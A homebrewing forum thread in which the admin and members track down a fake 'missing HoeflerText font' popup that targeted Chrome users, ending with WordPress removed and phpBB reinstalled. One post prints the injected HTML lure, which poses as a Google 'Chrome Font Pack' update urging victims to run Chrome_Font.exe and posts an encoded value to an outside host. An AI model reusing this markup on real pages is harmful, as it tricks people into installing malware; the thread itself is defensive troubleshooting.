Attack / Virus
- RubberToe
- Award Winner 13
- Posts: 3743
- Joined: Mon Mar 14, 2011 9:47 am
- Name: Rob
- Location: Dartmouth
- Contact:
Attack / Virus
Hey everyone,
A user has reported something suspicious, and it's an attack directed at Google Chrome users from what I can tell.
If you see any page asking you to install a missing font, DO NOT DO IT.
If anyone sees this popup / error / page, please let me know as I haven't tracked down how the attacker is doing this.
If it's one post or topic, please let me know which. Perhaps it's just something embedded in a post text.
Thanks,
-Rob
A user has reported something suspicious, and it's an attack directed at Google Chrome users from what I can tell.
If you see any page asking you to install a missing font, DO NOT DO IT.
If anyone sees this popup / error / page, please let me know as I haven't tracked down how the attacker is doing this.
If it's one post or topic, please let me know which. Perhaps it's just something embedded in a post text.
Thanks,
-Rob
Electric Brewery Build
On tap at RubberToe's:
Sometimes on a Sunday Belgian Dubbel, Oaked Old Ale, Ordinary Bitter
On tap at RubberToe's:
Sometimes on a Sunday Belgian Dubbel, Oaked Old Ale, Ordinary Bitter
- GAM
- Verified User
- Posts: 5403
- Joined: Wed May 18, 2011 2:50 pm
- Name: Sandy MacNeil
- Location: North End HFX
Re: Attack / Virus
Lots of it going around.
Thanks Rob.
S
Thanks Rob.
S
- jacinthebox
- Award Winner 16
- Posts: 3047
- Joined: Tue Oct 16, 2012 12:44 pm
- Name: Justin
- Location: Hubley
- Contact:
Re: Attack / Virus
yeah its a fake font install...only an issue for chrome users
Brathair Brewing
Brew Hard...Stay Humble
Brew Hard...Stay Humble
- RubberToe
- Award Winner 13
- Posts: 3743
- Joined: Mon Mar 14, 2011 9:47 am
- Name: Rob
- Location: Dartmouth
- Contact:
Re: Attack / Virus
I can't reproduce it with Chrome on Linux. Can someone on Windows try? You may need to come from Google search, so searching for "site:brewnosers.org brewing" might lead you to it.
Maybe it's just some specific topics with some embedded image / javascript somehow. I need to find it to kill it.
Maybe it's just some specific topics with some embedded image / javascript somehow. I need to find it to kill it.
Electric Brewery Build
On tap at RubberToe's:
Sometimes on a Sunday Belgian Dubbel, Oaked Old Ale, Ordinary Bitter
On tap at RubberToe's:
Sometimes on a Sunday Belgian Dubbel, Oaked Old Ale, Ordinary Bitter
- jacinthebox
- Award Winner 16
- Posts: 3047
- Joined: Tue Oct 16, 2012 12:44 pm
- Name: Justin
- Location: Hubley
- Contact:
Re: Attack / Virus
I had it on my home PC.
I resolved it but going to settings/advanced settings/reset settings.
it went away
https://malwaretips.com/blogs/remove-ch ... exe-virus/
bottom of the page...malware software didn't pick up on anything...maybe because i didn't click install on the virus popup
I resolved it but going to settings/advanced settings/reset settings.
it went away
https://malwaretips.com/blogs/remove-ch ... exe-virus/
bottom of the page...malware software didn't pick up on anything...maybe because i didn't click install on the virus popup
Brathair Brewing
Brew Hard...Stay Humble
Brew Hard...Stay Humble
- LeafMan66_67
- Award Winner 2
- Posts: 4596
- Joined: Fri Mar 02, 2012 7:10 am
- Name: Derek Stapleton
- Location: Lower Sackville, NS
Re: Attack / Virus
Definitely there if you link to the site via a Windows Google Search "site:brewnosers.org brewing". First two forum links give you the attached screen:
You do not have the required permissions to view the files attached to this post.
"He was a wise man who invented beer." - Plato
- RubberToe
- Award Winner 13
- Posts: 3743
- Joined: Mon Mar 14, 2011 9:47 am
- Name: Rob
- Location: Dartmouth
- Contact:
Re: Attack / Virus
While on that page, can you view source and see Hoefler anywhere in the text? I can't. But perhaps it's only in the initial load from Google.
Electric Brewery Build
On tap at RubberToe's:
Sometimes on a Sunday Belgian Dubbel, Oaked Old Ale, Ordinary Bitter
On tap at RubberToe's:
Sometimes on a Sunday Belgian Dubbel, Oaked Old Ale, Ordinary Bitter
- LeafMan66_67
- Award Winner 2
- Posts: 4596
- Joined: Fri Mar 02, 2012 7:10 am
- Name: Derek Stapleton
- Location: Lower Sackville, NS
Re: Attack / Virus
Can no longer get it to pop up.RubberToe wrote:While on that page, can you view source and see Hoefler anywhere in the text? I can't. But perhaps it's only in the initial load from Google.
"He was a wise man who invented beer." - Plato
- RubberToe
- Award Winner 13
- Posts: 3743
- Joined: Mon Mar 14, 2011 9:47 am
- Name: Rob
- Location: Dartmouth
- Contact:
Re: Attack / Virus
Odd. If you can get it to happen again please update.
Electric Brewery Build
On tap at RubberToe's:
Sometimes on a Sunday Belgian Dubbel, Oaked Old Ale, Ordinary Bitter
On tap at RubberToe's:
Sometimes on a Sunday Belgian Dubbel, Oaked Old Ale, Ordinary Bitter
- RubberToe
- Award Winner 13
- Posts: 3743
- Joined: Mon Mar 14, 2011 9:47 am
- Name: Rob
- Location: Dartmouth
- Contact:
Re: Attack / Virus
Wordpress was highly suspect so I removed it. It's still puzzling but it was at the top level of the site. Looking through it's files there was something fishy as well. Wordpress has been a common attack vector for a long time, we don't maintain ours. Therefore I figure it's a liability so I removed it.
If anyone wants to replace the main web page I'm open to suggestions.
If anyone can reproduce this Chrome font thing I would like to know.
Thanks,
-Rob
If anyone wants to replace the main web page I'm open to suggestions.
If anyone can reproduce this Chrome font thing I would like to know.
Thanks,
-Rob
Electric Brewery Build
On tap at RubberToe's:
Sometimes on a Sunday Belgian Dubbel, Oaked Old Ale, Ordinary Bitter
On tap at RubberToe's:
Sometimes on a Sunday Belgian Dubbel, Oaked Old Ale, Ordinary Bitter
-
- Award Winner 1
- Posts: 43
- Joined: Fri Jan 13, 2012 4:15 pm
- Name: Mark Power
- Location: Elmsdale, NS
Re: Attack / Virus
Hey Rob,
I can reproduce by doing a google search for "site:brewnosers.org brewing" Any forum link i click will cause the font thing to open. If i view source it does have Hoefler in the text
Im using Windows 10 and chrome Version 56.0.2924.87
I can reproduce by doing a google search for "site:brewnosers.org brewing" Any forum link i click will cause the font thing to open. If i view source it does have Hoefler in the text
Code: Select all
<div id="dm-overlay"><div id="dm-table"><div id="dm-cell"><div id="dm-modal"><div id="dm-table"><a href="javascript:void(0)" onclick="document.getElementById('dm-overlay').style.display = 'none'; setTimeout(dy0,1000);" id="cl0se"></a><img id="l0gos" alt='' /><p id="pphh" >The "HoeflerText" font wasn't found.</p></div><div id="odiv9"><p id="info1" >The web page you are trying to load is displayed incorrectly, as it uses the "HoeflerText" font. To fix the error and display the text, you have to update the "Chrome Font Pack".</p><p id="info2" style="display:none;">Step 1: In the bottom left corner of the screen you'll see the download bar. <b id="bbb1">Click on the Chrome_Font.exe</b> item.<br id="brbr1" />Step 2: Press <b id="bbb1">Yes(Run)</b> in order to see the correct content on the web page.</p><div id="divtabl"><table id="tabl1"><tbody id="tbody1"><tr id="trtr1"><td id="tdtd1">Manufacturer:</td><td id="tdtd1">Google Inc. All Rights Reserved</td></tr><tr id="trtr1"><td id="tdtd1">Current version:</td><td id="tdtd1">Chrome Font Pack <b id="bbb2">53.0.2785.89</b></td></tr><tr id="trtr1"><td id="tdtd1">Latest version:</td><td id="tdtd1">Chrome Font Pack <b id="bbb2">57.2.5284.21</b></td></tr></tbody></table><div id="helpimg"><img id="inf0s" alt='' /></div></div><form action="http://www.ibdaa.edu.sa/main.php" method="post" id="form_1d"><input type='hidden' name='infol' value='1ruQABqyXM4ZJccx2UKWo1SbGco0MV3G1PY+pCWlGtqGo1CKYt0=' /></form><div id="upe0" onclick="ue0()" ><a href="javascript:void(0)" id="b00tn">Update</a></div></div></div></div></div><div id="popup-container" class="popup-window gc" style="display:none;"><div class="bigarrow element-animation"></div></div></div>
<script>
-
- Award Winner 1
- Posts: 43
- Joined: Fri Jan 13, 2012 4:15 pm
- Name: Mark Power
- Location: Elmsdale, NS
Re: Attack / Virus
Update: I was able to reproduce this several times in a row before replying, but while checking what version of Chrome i had, it initiated an update. Now it is on Version 57.0.2987.98 and I am no longer able to reproduce it, and the source no longer has the above snipped i posted.
- RubberToe
- Award Winner 13
- Posts: 3743
- Joined: Mon Mar 14, 2011 9:47 am
- Name: Rob
- Location: Dartmouth
- Contact:
Re: Attack / Virus
Thanks for the info, Mark!
Electric Brewery Build
On tap at RubberToe's:
Sometimes on a Sunday Belgian Dubbel, Oaked Old Ale, Ordinary Bitter
On tap at RubberToe's:
Sometimes on a Sunday Belgian Dubbel, Oaked Old Ale, Ordinary Bitter
- jimboh
- Verified User
- Posts: 326
- Joined: Tue Dec 13, 2016 1:46 pm
- Name: jim
- Location: Jeddore NS
Re: Attack / Virus
I used chrome to access the site for the first time today, had been using firefox. Got the virus warning. Tried to view source but the popup no longer appears.
Drinking: Best Coast IPA, Old Speckled Hen Clone, Northern Lights (NG),
Belgian Saison, Blonde Ale, Toy Soldier Stout(OBK) and 14G batch of ESB.
Fermenting: Taking a rest!
Scheduled: Another 10G of Toy Soldier Stout.
Belgian Saison, Blonde Ale, Toy Soldier Stout(OBK) and 14G batch of ESB.
Fermenting: Taking a rest!
Scheduled: Another 10G of Toy Soldier Stout.
- jimboh
- Verified User
- Posts: 326
- Joined: Tue Dec 13, 2016 1:46 pm
- Name: jim
- Location: Jeddore NS
Re: Attack / Virus
Hi I am using a different computer and visited the site using chrome and got the virus. I saved the source for the whole page if its any use to you. Let me know if you want me to upload the txt file as an attachment or email it?
I got there by typing brewnosers in search and it was the first.
The google link is https://www.google.ca/url?sa=t&rct=j&q= ... OVt7nYTYfw" onclick="window.open(this.href);return false;
I believe its cached so it may be a problem you no longer have. Don't know if you can request google to refetch the page due to this issue
I got there by typing brewnosers in search and it was the first.
The google link is https://www.google.ca/url?sa=t&rct=j&q= ... OVt7nYTYfw" onclick="window.open(this.href);return false;
I believe its cached so it may be a problem you no longer have. Don't know if you can request google to refetch the page due to this issue
Drinking: Best Coast IPA, Old Speckled Hen Clone, Northern Lights (NG),
Belgian Saison, Blonde Ale, Toy Soldier Stout(OBK) and 14G batch of ESB.
Fermenting: Taking a rest!
Scheduled: Another 10G of Toy Soldier Stout.
Belgian Saison, Blonde Ale, Toy Soldier Stout(OBK) and 14G batch of ESB.
Fermenting: Taking a rest!
Scheduled: Another 10G of Toy Soldier Stout.
- RubberToe
- Award Winner 13
- Posts: 3743
- Joined: Mon Mar 14, 2011 9:47 am
- Name: Rob
- Location: Dartmouth
- Contact:
Re: Attack / Virus
Thanks.
Electric Brewery Build
On tap at RubberToe's:
Sometimes on a Sunday Belgian Dubbel, Oaked Old Ale, Ordinary Bitter
On tap at RubberToe's:
Sometimes on a Sunday Belgian Dubbel, Oaked Old Ale, Ordinary Bitter
- danlatimer
- Verified User
- Posts: 275
- Joined: Sun Apr 26, 2015 9:45 pm
- Name: Daniel N Latimer
Re: Attack / Virus
It just happened to me again.
This is the culprit: https://malwaretips.com/blogs/remove-ch ... exe-virus/" onclick="window.open(this.href);return false;
Here's a forum post about server admins talking about trying to get rid of it. They apparently eventually did but they didn't post how they did it:S http://forum.odroid.com/viewtopic.php?t=25568" onclick="window.open(this.href);return false;
After 5 minutes or so it stopped happening again. Probably a strategy to prevent it from being fixed.
Here are a few pictures of it happening
This is the culprit: https://malwaretips.com/blogs/remove-ch ... exe-virus/" onclick="window.open(this.href);return false;
Here's a forum post about server admins talking about trying to get rid of it. They apparently eventually did but they didn't post how they did it:S http://forum.odroid.com/viewtopic.php?t=25568" onclick="window.open(this.href);return false;
After 5 minutes or so it stopped happening again. Probably a strategy to prevent it from being fixed.
Here are a few pictures of it happening
- RubberToe
- Award Winner 13
- Posts: 3743
- Joined: Mon Mar 14, 2011 9:47 am
- Name: Rob
- Location: Dartmouth
- Contact:
Re: Attack / Virus
Thanks, I'm digging again.
Electric Brewery Build
On tap at RubberToe's:
Sometimes on a Sunday Belgian Dubbel, Oaked Old Ale, Ordinary Bitter
On tap at RubberToe's:
Sometimes on a Sunday Belgian Dubbel, Oaked Old Ale, Ordinary Bitter
- RubberToe
- Award Winner 13
- Posts: 3743
- Joined: Mon Mar 14, 2011 9:47 am
- Name: Rob
- Location: Dartmouth
- Contact:
Re: Attack / Virus
Screw this, I'm installing a fresh copy of PHPBB. Here goes... don't worry, I have lots of backups.
Electric Brewery Build
On tap at RubberToe's:
Sometimes on a Sunday Belgian Dubbel, Oaked Old Ale, Ordinary Bitter
On tap at RubberToe's:
Sometimes on a Sunday Belgian Dubbel, Oaked Old Ale, Ordinary Bitter
- RubberToe
- Award Winner 13
- Posts: 3743
- Joined: Mon Mar 14, 2011 9:47 am
- Name: Rob
- Location: Dartmouth
- Contact:
Re: Attack / Virus
The site has been upgraded. Now I have to fix the style. And new tapatalk!
Electric Brewery Build
On tap at RubberToe's:
Sometimes on a Sunday Belgian Dubbel, Oaked Old Ale, Ordinary Bitter
On tap at RubberToe's:
Sometimes on a Sunday Belgian Dubbel, Oaked Old Ale, Ordinary Bitter
Who is online
Users browsing this forum: No registered users and 23 guests